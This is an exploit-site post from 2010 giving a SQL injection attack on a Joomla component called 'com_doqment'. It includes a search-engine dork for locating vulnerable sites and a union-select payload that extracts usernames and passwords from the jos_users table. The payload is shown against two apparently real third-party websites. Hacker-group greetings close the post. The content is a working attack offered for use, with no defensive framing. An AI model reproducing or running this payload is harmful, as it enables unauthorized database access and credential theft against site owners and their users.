[D] Script JOMMLA ----> Sql injection [Z]
2010-11-24 15:04:18Posted by: kedans
-------------------------------------------------------------------------
# Script JOMMLA ----> Sql injection
# Author : KedAns-Dz
# Date : n/a
# Dork : PHP SQL injection
# Exampl : google.com --- > sharech : " inurl:index.php?option=com_doqment&cid= + sql injection
# // : http://www.phdbrasil.com.br/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
--------------------------------------------------------------------------
Exploiat :
http://[Victim-web]/index.php?option=com_doqment&cid= ***SQl DZ***
*** SQL DZ *** -----> ::
-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
Exampl 2 : http://theancientsprings.de/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
--------------------------------------------------------------------------------------
** E-mail : [email protected] **
# Greetz : Islampard * BadR0 * NoRo founy * dr.Ride * Red1One * XoreR King * ...
HaCkerS-Street-Team *DZ* ..
Fixes
No fixesIn order to submit a new fix you need to be registered.